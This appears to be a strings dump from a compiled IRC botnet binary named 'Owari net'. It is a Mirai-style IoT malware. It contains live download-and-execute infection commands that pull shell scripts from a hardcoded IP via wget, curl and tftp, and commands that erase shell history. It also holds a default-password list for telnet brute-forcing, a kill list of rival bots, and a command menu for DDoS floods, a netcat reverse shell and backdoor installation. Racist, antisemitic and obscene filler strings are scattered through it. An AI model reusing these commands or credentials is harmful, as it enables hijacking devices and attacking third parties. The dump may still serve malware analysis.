PTRh
Ph`z
QSRP
RQSVW
[^_]
<.u*
<.u2
RQSVPh`
[^_]
RQSVPh
[^_]
RQSVPhH
[^_]
[^_]
VWSPh
VWSPh
VWSPh
VWSPh
[^_]
VWSPh
[^_]
RQSVPh
[^_]
RQSVPh 
[^_]
</v	
<suB
<du0
<xu0
<Xu0
<uu-
<cuJ
RQSPVW
[^_]
RQSPVW
[^_]
[^_]
SVWRQP
SVWRQP
[^_]
SVWRQP
[^_]
;E }
SVPRh
SVPRh
SVPRh 
[^_]
SVPRh
SVPRh
SVPRh
SVPRhD
SVPRh|
SVPRh
[^_]
RQSVPh
RPhG
< t&
Ph!T
WVSQ
Kuze
senp
aiIs
Your
SVWPh
<:uu
Y[^_]
s/;%
\$ ;
S\ZY
UWVS
RRPS
D$8P
L$8Q
)l$(
9D$(s
\$(iD$
 @tH
;\$(
t!HuE
K`Uh
SPSh
|$81
t$9{
UWVS
\$$S
YXSh
Y^Sh
[^_]
 Y[[
s/;%
UWVS
sQQUV
D$$Pj
[^_]
s/;%
D$pQQjXPR
UWVS
VUPS
[^_]
PPVW
tq;5
ti;5
ta;5
tYPPV
UWVS
[^_]
[^_]
s/;%
UWVS
[^_]
UWVS
[^_]
UWVS
PPUW
t%WW
t$0U
[^_]
\$4Pj
t$0Pj
t$<VS
s/;%
u*Ph
PPSj
D$$Q
D$,Pj
UWVS
t$,U
[^_]
t$ V
;K s
s/;%
Z<XZ[
P<Y[[
Z<XZ[
UWVS
[^_]
s/;%
UWVS
t$@P
D$$Pj
[^_]
[^_]
s/;%
UWVS
[^_]
WVS1
\$ S
s/;%
t#PP
T$4XZj
UWVS
[^_]
s/;%
UWVS
[^_]
u PPj
D$ P
PRQW
T$(S
UWVS
RRPV
[^_]
T$(S
T$$S
PPSV
UWVS
[^_]
UWVS
tXPj
t$(W
PSVW
	USVW
[^_]
UWVS
^8WSha
D$(P
D$(P
[^_]
t$(j
UWVS
t%VUSP
[^_]
UWVS
t$$P
[^_]
|$4h@
t29{
D$$PV
 [^_
<wt#
D$8P
QQSP
D$(P
t$Ph
t$(V
Degas are we not drawn onward no In union drawn onward to new eras aged
UWVS
<rt>
<wt7f
<at/
E4tmPh
t$(V
[^_]
UWVS
[^_]
QPRS
^8PSha
t$,V
UWVS
t$$S
[^_]
UWVS
T$`~
D$(%
WVPR
$VRP
?0u+
VVhf
D$ P
PQRR
QQRW
[^_]
tP~N
t@~>=
UWVS
<$u0
\$L9
~	<mtN
:*u4
T$X:
L$pE
D$`P
L$p)
\[^_]
^8RSha
^8QSha
`SSVW
^8QSha
RRVW
^8QSha
D$ P
D$ P
UWVS
^8PSha
[^_]
UWVS
[^_]
t@;C
AIt	
UWVS
ZY[^_]
UWVS
D$gP
[^_]
UWVS
Z[^_]
PVWS
\$HPh
D$)P
[^_]
ZYj%
SRPj
VRPj
VQRSP
u	Qj
[^_]
UWVS
!D$`
T$`	
Wj j
\$(S
t$<Sj
D$LPV
L[^_]
UWVS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQQVh
u+Rj
D$$P
,[^_]
UWVS
|$-1
+<0u$
D<,.f
\$7S
<[^_]
UWVS
Pj j
D$HP
D$t)
;D$|v
!WWR
[^_]
UWVS
.u5A
Z[^_]
WVS1
D$ P
D$$Ph
UWVS
t$xSU
t$xj
t$hW
\$DS
D$TPh
E$VRWP
uZRj
t$,U
L[^_]
UWVS
u-PP
t$xj
Pj(j
D$,P
\$TS
D$(P
D$dPh
t$(W
uORj
\[^_]
UWVS
D$ Wj(j
t$xVU
t$xVU
\$TS
D$(P
D$dPh
t$(W
\[^_]
D$ Pj
D$ Pj
xAPPSh
UWVS
\$Th
D$8P
T$ !
#t$ 
2#D$ 
D$8P
[^_]
UWVS
t$8R
$9D$
t$8S
\$0PPj
[^_]
UWVS
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
SSPQ)
[^_]
uXRh
\$ S
D$,Ph
UWVS
[^_]
UWVS
[^_]
UWVS
;<$|
XZKy
[^_]
UWVS
[^_]
D$ [Xj
}/QQ
uJQQj
t$@h
D$4j
UWVS
 <xu
(<`v
}/C;T$
D$,!
[^_]
t$$h
UWVS
u%WWSS
ZYSS
[^_]
yPPj
T$ j
D$ P
PPSh
UWVS
Qjxj
D$ P
t@;D$xu
PPhT9
uVPPh
PPSj
t$Dj
D$<PR
t$(j
UWVS
\$89
[^_]
UWVS
)\$(
[^_]
UWVS
PVUR
whQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
e<au
u*z(
alula
u?z=
D$Pp
|$6f
l$61
D$(RP
} Pj
D$'g
D$'f)
D$\p
|$d9
T$`)
L$t1
|$'fto
[^_]
QQWS
'RRWS
u PPj
t%9~
[^_]
UWVS
D$`f
t$lP
T$`f
pQQj
Ph!T
[^_]
LPj 
F,QQPW
P SP
WWSQ
[^_]
u-QQj
D$(P
D$,3D$(P
D$$QQPh
|$0f
D$ P
 [^_
t9PP
t&PP
u\PPSV
tLPP
t9PP
t&PP
QQPV
t_PP
C Qj
D$8XZ
C Qj
C Qj
C Qj
C Qj
C Qj
D$8XZ
UWVS
"QQV
RRPS
PVWS
[^_]
UWVS
 ;l$
[^_]
UWVS
XZWU
[^_]
UWVS
t$DVW
[^_]
UWVS
[^_]
UWVS
\$ S
UQh$
!RRWS
PPWS
D$ P
[^_]
D$ P
uJQQ
t	r4
UWVS
l$8WV
[^_]
[^_]
;D$(ww
t	r@
J@t]
UWVS
6;t$
t	r:
[^_]
[^_]
UWVS
u2PPh
$< t,<	t(
8PPj
[^_]
UWVS
l$Hh
D$09F
t*PPW
t$DV
[^_]
D$ Ph
UWVS
t$<h
t-PPU
t$DV
[^_]
D$ Ph
 [^_
x[Rj
 [^_
PSh3
[^_]
UWVS
G;|$,s\PS
[^_]
UWVS
D$7h
D$<XZj
\$PS
D$$;
}3Ph
t$(j
D$LPU
D$,9
uOQh
K9\$$}
PPVU
;\$d|
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$H^_j
uDQh
K9\$$}
D$(@
tMQh
[^_]
UWVS
t>QQh
\$$S
[^_]
t$4j
t$8j
u6j.
t$HV
t$hj
^8QSha
UWVS
^8PSha
D$(PV
x6RW
D$(PV
[^_]
WVS1
UWVS
L$HAC
t/r'
9t$(t
T$$)D$
tKr9
$9,$t
$9<$t
L$HAC
,[^_]
WVS1
PPj@j
|$$W
YXSW
 [^_
tLPP
t9PP
QQh'e
UWVS
[^_]
UWVS
Qj VS
[^_]
D$<P
Phtg
D$8P
Phtg
UWVS
F;t$(r
[^_]
UWVS
>;|$,w
t$09
UQVj
[^_]
UWVS
[^_]
UWVS
PPj#
u,PP
t$4U
[^_]
UWVS
t$$f
T$ 1
[^_]
UWVS
u}QQh
DPPh
_XSV
[^_]
ZYSP
UWVS
PPhS
PPWS
[^_]
UWVS
YRRj.W
D$()
[^_]
89.46.222.250
Kuze-senpai
Morpheus
SKID-API
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.239.64.5/giga.sh || curl -O http://23.239.64.5/giga.sh; chmod 777 giga.sh; sh giga.sh; busybox tftp 23.239.64.5 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 23.239.64.5; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf giga.sh tftp1.sh tftp2.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget http://23.239.64.5/giga.sh || curl -O http://23.239.64.5/giga.sh; chmod 777 giga.sh; sh giga.sh; busybox tftp 23.239.64.5 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 23.239.64.5; chmod 777 tftp2.sh; sh tftp2.sh;; rm -rf *.sh; history -c; history -w; rm -rf ~/.bash_history
cd /tmp; wget http://23.239.64.5/giga.sh; chmod 777 giga.sh; sh giga.sh;
mirai.*
dlr.*mips
mips64
mipsel
sh2eb
sh2elf
armv5
armv4tl
armv4
armv6
i686
powerpc
powerpc440fp
i586
m68k
sparc
x86_64
jackmy*
hackmy*
busyboxterrorist
dvrHelper
kmy*
lol*
telmips
telmips64
telmipsel
telsh2eb
telsh2elf
telsh4
telx86
telarmv5
telarmv4tl
telarmv4
telarmv6
teli686
telpowerpc
telpowerpc440fp
teli586
telm68k
telsparc
telx86_64
TwoFace*
xxb*
busybotnet
busybox
badbox
gaybot
hackz
bin*
gtop
botnet
swatnet
ballpit
fucknet
cracknet
weednet
gaynet
queernet
ballnet
unet
yougay
sttftp
sstftp
sbtftp
btftp
y0u1sg3y
bruv*
IoT*
kawi*
kiwi*
botgod*
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0
SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000
MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Vivaldi/1.3.501.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
root
admin
A Santa lives evil at NASA
guest
default
user
daemon
telnet
Administrator
mg3500
admin1
ubnt
support
zyad5001
000000
14567
hi3518
pass
admin14
7ujMko0admin
00000000
klv1
klv14
oelinux1
realtek
1111
54321
antslq
zte9x15
system
1456
888888
ikwb
password
juantech
Zte521
xc3511
1111111
service
4321
tech
abc1
switch
meinsm
smcadmin
14567890
anko
merlin
zlxx.
supervisor
administrator
666666
klv1234
jvbzd
zlxx
7ujMko0vizxv
dreambox
1234
12345
123456
fucker
vizxv
xmhdipc
admin1234
klv123
/tmp/*
/var/*
/var/run/*
/var/tmp/*
user
ogin
name
pass
dvrdvs
mdm9625
9615-cdp
F600
F660
F609
nvalid
ailed
ncorrect
enied
rror
oodbye
shell
x86_32
NOTICE %s :Unable to comply.
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
%s : USERID : UNIX : %s
NOTICE %s :GET <host> <save as>
NOTICE %s :Unable to create socket.
http://
NOTICE %s :Unable to resolve address.
NOTICE %s :Unable to connect to http.
GET /%s HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
NOTICE %s :Receiving file.
NOTICE %s :Saved as %s
NOTICE %s :Spoofs: %d.%d.%d.%d
NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
NOTICE %s :Owari net version: 4.0b by Kuze-senpai, Milenko and Morpheus
NOTICE %s :NICK <nick>
NOTICE %s :Nick cannot be larger than 32 characters.
NICK %s
SKID
NICK [%s|%s]%s
NOTICE %s :DISABLE <pass>
Disabled
Enabled and awaiting orders
NOTICE %s :Current status is: %s
NOTICE %s :Already disabled.
NOTICE %s :Password too long! > 254
NOTICE %s :Disable sucessful.
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Wrong password
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
192.168.3.100
NOTICE %s :DNS <IP> <port> <reflection file url> <threads> <time>
wget "%s" -q -O DNS.txt || busybox wget "%s" -O DNS.txt || /bin/busybox wget "%s" -O DNS.txt || /usr/busybox wget "%s" -O DNS.txt || /var/run/busybox wget "%s" -O DNS.txt
DNS.txt
NOTICE %s :DNS amp attacking %s:%s
public
192.168.1.83
NOTICE %s :SNMP <IP> <port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>
wget "%s" -q -O SNMP.txt || busybox wget "%s" -O SNMP.txt || /bin/busybox wget "%s" -O SNMP.txt || /usr/busybox wget "%s" -O SNMP.txt || /var/run/busybox wget "%s" -O SNMP.txt
SNMP.txt
NOTICE %s :SNMP amp attacking %s:%s
NOTICE %s :WGETFLOOD <url> <secs>
NOTICE %s :HTTP Flooding %s
wget -U "%s" -q "%s" -O /dev/null || busybox wget -U "%s" -q "%s" -O /dev/null || /bin/busybox wget -U "%s" -q "%s" -O /dev/null || /usr/busybox wget -U "%s" -q "%s" -O /dev/null &
NOTICE %s :NTP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>
wget "%s" -q -O NTP.txt || busybox wget "%s" -O NTP.txt || /bin/busybox wget "%s" -O NTP.txt || /usr/busybox wget "%s" -O NTP.txt || /var/run/busybox wget "%s" -O NTP.txt
NTP.txt
NOTICE %s :NTP amp attacking %s:%s
NOTICE %s :BLACKNURSE <target ip> <secs>
socket
NOTICE %s :Blacknursing %s
sendto
%d.%d.%d.%d
NOTICE %s :GRE <target IP> <port dest> <number threads to use> <pps limiter, -1 for no limit> <time>
NOTICE %s :GRE ATTACKING %s
TSource Engine Query
NOTICE %s :VSE <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>
NOTICE %s :VSE ATTACKING %s
NOTICE %s :VOLTUDP <target IP> <pps limiter, -1 for no limit> <threads> <time>
NOTICE %s :VOLTUDP ATTACKING: %s
NOTICE %s :XDMCP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>
wget "%s" -q -O XM.txt || busybox wget "%s" -O XM.txt || /bin/busybox wget "%s" -O XM.txt || /usr/busybox wget "%s" -O XM.txt || /var/run/busybox wget "%s" -O XM.txt
XM.txt
NOTICE %s :XDMCP ATTACKING: %s
objectClass0
NOTICE %s :LDAP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>
wget "%s" -q -O LDAP.txt || busybox wget "%s" -O LDAP.txt || /bin/busybox wget "%s" -O LDAP.txt || /usr/busybox wget "%s" -O LDAP.txt || /var/run/busybox wget "%s" -O LDAP.txt
LDAP.txt
NOTICE %s :LDAP ATTACKING: %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s
Do nine men interpret Nine men I nod
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s
NOTICE %s :GIGATCP <target> <method> <secs>
NOTICE %s :GIGA-TCP Flooding %s using the ' %s ' method Request
xmas
usyn
GigAck
GigaSyn
NOTICE %s :UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs>
random
NOTICE %s :Unknowning %s:%s with packet size %s
smack
tfw no gf
frienzoned
cunts
NullzSec
NullzSec rox
Sh4dow on your 4head
get raped
not a ddos packet
also not a ddos packet
seriously not a ddos packet
GET / HTTP/1.1
Host: goatse.info
GET / HTTP/1.1
Host: tubgirl.ca
GET / HTTP/1.0
Host: goatse.info
GET / HTTP/1.0
Host: tubgirl.ca
8======D~~~~~~~
suck it
give succ
big nigger dick 8============================D
( . Y . ) tiddies
bigNullz
eye pee rape
eye pee address rape
IP rape
This is LOIC
LOIC
HOIC
XOIC
LHXOIC
A cat is fine too. Desudesudesu~
the biiiiig pussy
benis
penis
dick
vagina
clitoris
pussy
dic pic?
send nudes
https://youtu.be/dQw4w9WgXcQ
Never gonna give you up
Never gonna make you cry
Never gonna let you die
Never gonna hurt you
bush did 9/11
jet fuel can't melt steel beams
Kuze-senpai is your god
the illuminati is real
wake up sheep
i flex like david ike
6 million jews? show me the proof!
T R I G G E R E D
my gf killed herself
free masons suck cock
ihatejews
urgay
tfw u like dick
dickbutt
The elusive dickbut
Heyyy that's pretty gooood
NSA sucks cock
FBI sucks cock
You name it they suck cockWhat am I doing with my life
Oh yeah I like nulling shit
HIIYYOOOOOOO (Customgrow420)
Keemstar is a fucking knome
Leafy is gawd <3
Ourmine is full of skids
Sh4dow is the greatest
KEKSTD
NOTICE %s :STD <ip> <port> <time>
NOTICE %s :STD attacking %s:%s
(null)
thanks to unhappygh0st for the honeypot ip ranges :)
NOTICE %s :TCP <target> <port> <time> <flags/method> <packetsize> <pollinterval> <threads>
NOTICE %s :TCP flooding %s:%d with %s and %d threads
close
keep-alive
accept
%s %s HTTP/1.1
Accept: */*
User-Agent: %s
Connection: %s
NOTICE %s :HTTP <method> <target> <port> <path> <time> <power>
NOTICE %s :HTTP flooding %s with %d power
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
NOTICE %s :OLDHTTP <method> <target> <port> <path> <time> <power> = The good ol' http flooder
NOTICE %s :OLDHTTP flooding %s with %d power
NOTICE %s :JUNK <ip> <port> <time>
NOTICE %s :JUNK flooding %s:%s
NOTICE %s :HOLD <ip> <port> <time>
NOTICE %s :HOLD flooding %s:%s
:>%$#
PRIVMSG %s :[TELNET-GIGANET] CRACKED - %s:23 %s:%s
shell
PRIVMSG %s :[TELNET-GIGANET] INFECTED - %s:23 %s:%s
PRIVMSG %s :[TELNET-GIGANET] FAILED TO INFECT - %s:23 %s:%s
PRIVMSG %s :[MIRAI-GIGANET] CRACKED - %s:23 %s:%s
PRIVMSG %s :[MIRAI-GIGANET] INFECTED - %s:23 %s:%s
PRIVMSG %s :[MIRAI-GIGANET] FAILED TO INFECT - %s:23 %s:%s
PRIVMSG %s :[REGULAR-GIGANET] CRACKED - %s:23 %s:%s
PRIVMSG %s :[REGULAR-GIGANET] INFECTED - %s:23 %s:%s
PRIVMSG %s :[REGULAR-GIGANET] FAILED TO INFECT - %s:23 %s:%s
NOTICE %s :SCANNER <ON/OFF>
PRIVMSG %s :[TELNET] [+] SCANNER STARTED!
PRIVMSG %s :[TELNET] [-] FAILED TO START SCANNER!
PRIVMSG %s :[TELNET] [+] SCANNER ALREADY STARTED!
PRIVMSG %s :[TELNET] [+] SCANNER KILLED!
PRIVMSG %s :[TELNET] [-] FAILED TO KILL SCANNER!
PRIVMSG %s :[TELNET] [+] SCANNER NOT STARTED!
NOTICE %s :MIRAI <ON/OFF>
PRIVMSG %s :[MIRAI] [+] SCANNER STARTED!
PRIVMSG %s :[MIRAI] [-] FAILED TO START SCANNER!
PRIVMSG %s :[MIRAI] [+] SCANNER ALREADY STARTED!
PRIVMSG %s :[MIRAI] [+] SCANNER KILLED!
PRIVMSG %s :[MIRAI] [-] FAILED TO KILL SCANNER!
PRIVMSG %s :[MIRAI] [+] SCANNER NOT STARTED!
NOTICE %s :REGULAR <ON/OFF>
PRIVMSG %s :[REGULAR] [+] SCANNER STARTED!
PRIVMSG %s :[REGULAR] [-] FAILED TO START SCANNER!
PRIVMSG %s :[REGULAR] [+] SCANNER ALREADY STARTED!
PRIVMSG %s :[REGULAR] [+] SCANNER KILLED!
PRIVMSG %s :[REGULAR] [-] FAILED TO KILL SCANNER!
PRIVMSG %s :[REGULAR] [+] SCANNER NOT STARTED!
pkill -9 %s || busybox pkill -9 %s || /usr/busybox pkill -9 %s || /bin/busybox pkill -9 %s || /var/run/busybox pkill -9 %s
history -c;history -w
cd /root;rm -f .bash_history
cd /var/tmp; rm -f *
NOTICE %s :%s resolves to %s
NOTICE %s :DNS2IP <domain>
NOTICE %s :UPDATEHTTP <host> <src:bin>
NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).
gcc --help
Usage
NOTICE %s :Receiving update.
mkdir /tmp
/tmp/.c
(gcc -o %s /tmp/.c; rm -f /tmp/.c; kill -9 %d; %s &) > /dev/null 2>&1
/tmp/.o
export PATH=/usr/sbin:/bin:/usr/bin:/sbin:/var/bin;chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall kt*;/var/bin/killall .o;/var/bin/sleep 5;trap  1;/tmp/.o '&
NOTICE %s :MOVE <server>
/var/bin
NOTICE %s :HACKPGK <url> <binary name>
GET /%s HTTP/1.1
Connection: Keep-Alive
User-Agent: HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
NOTICE %s :Installed %s to hack path.
cat %s > /var/bin/%s
rm -f %s
chmod 775 /var/bin/%s
ls -l /var/bin/%s
NOTICE %s :Non-root/non-spoof DDoS commands commands:
NOTICE %s :    STD <host> <port> <time> = A non spoofed STD flooder
NOTICE %s :    OVH <host> <port> <throttle> <time> = A non spoofed UDP OVH flooder
NOTICE %s :    vTCP <ip> <port> <time> = A non spoofed Randomizer TCP flooder Flag
NOTICE %s :    HOLD <host> <port> <time> = A vanilla TCP connect flooder
NOTICE %s :    JUNK <host> <port> <time> = A vanilla TCP flooder (modded)
NOTICE %s :    UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = An advanced non spoof UDP flooder modified by Freak
NOTICE %s :    HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
NOTICE %s :    WGETFLOOD <url> <secs> = An HTTP(S) flooder
NOTICE %s :Spoof/root commands:
NOTICE %s :    UDP <target> <port> <secs> = A UDP flooder
NOTICE %s :    VSET <method> <target> <thread> <time> = Valve Source Engine Flood, using the TQuery Engine Source EXPLOIT.
NOTICE %s :    PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers
NOTICE %s :    TCP <target> <port> <time> <flags> <packetsize> <pollinterval> <threads> = An advanced TCP flooder with multithreading. Will kill almost any service.
NOTICE %s :    GIGATCP Flooding <target> <flags/method> <secs> = Advanced Spoofed TCP Flooder
NOTICE %s :    BLACKNURSE <target ip> <secs> = An ICMP packet flooder that will crash most firewalls and use loads of CPU. USE EXTREME CARE
NOTICE %s :    SOCKSTRESS <ip>:<port> <interface> -s <time> [-p payload] [-d delay]
NOTICE %s :    NTP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A NTP DrDoS flooder. Very potent.
NOTICE %s :    DNS <IP> <port> <reflection file url> <threads> <time> = A DNS DrDoS flooder. Almost unblockable.
NOTICE %s :    SNMP <IP> <port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> =   SNMP DrDoS flooder. Insane amp factor (600 - 1700x)
NOTICE %s :Other commands:
NOTICE %s :    RNDNICK = Randomizes the knights nick
NOTICE %s :    NICK <nick> = Changes the nick of the client
NOTICE %s :    SERVER <server> = Changes servers
NOTICE %s :    GETSPOOFS = Gets the current spoofing
NOTICE %s :    SPOOFS <subnet> = Changes spoofing to a subnet
NOTICE %s :    DISABLE = Disables all packeting from this client
NOTICE %s :    ENABLE = Enables all packeting from this client
NOTICE %s :    KILL = Kills the knight
NOTICE %s :    DNS2IP <domain>
NOTICE %s :    GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
NOTICE %s :    UPDATE <http address> <src:bin> = Update this bot
NOTICE %s :    HACKPKG <http address> <bin name> = HackPkg is here! Install a bin, using http, no depends!
NOTICE %s :    VERSION = Requests version of client
NOTICE %s :    KILLALL = Kills all current packeting
NOTICE %s :    HELP = Displays this
NOTICE %s :    IRC <command> = Sends this command to the server
NOTICE %s :    SH <command> = Executes a command
NOTICE %s :    ISH <command> = SH, interactive, sends to channel
NOTICE %s :    SHD <command> = Executes a psuedo-daemonized command
NOTICE %s :    GETBB <tftp server> = Get a proper busybox
NOTICE %s :    INSTALL  <http server/file_name> = Download & install a binary to /var/bin 
NOTICE %s :    BASH <cmd> = Execute commands using bash. 
NOTICE %s :    BINUPDATE <http:server/package> = Update a binary in /var/bin via wget 
NOTICE %s :    SCAN <nmap options> = Call the nmap wrapper script and scan with your opts. 
NOTICE %s :    RSHELL <server> <port> = Equates to nohup nc ip port -e /bin/sh
NOTICE %s :    LOCKUP <http:server> = Kill telnet, d/l aes backdoor from <server>, run that instead.
NOTICE %s :    GETSSH <http:server/dropbearmulti> = D/l, install, configure and start dropbear on port 30022.
NOTICE %s :Killing pid %d.
kill -9 %d;kill -9 0
%s%s
NOTICE %s :History cleared!
LDAP
XDMCP
VOLTUDP
UNKNOWN
HTTP
OLDHTTP
WGETFLOOD
HOLD
JUNK
GIGATCP
SNMP
BLACKNURSE
SCANNER
MIRAI
REGULAR
DNS2IP
NICK
RNDNICK
CLEARHISTORY
SERVER
GETSPOOFS
SPOOFS
HACKPKG
Tacocat
DISABLE
ENABLE
UPDATE
KILLTHEFUCKERS
BOTKILL
VERSION
KILLALL
HELP
IRC 
export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
NOTICE %s :%s
SHD 
export HOME=/tmp;export;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;trap '' 1 2; sh -c '%s'&
GETBB 
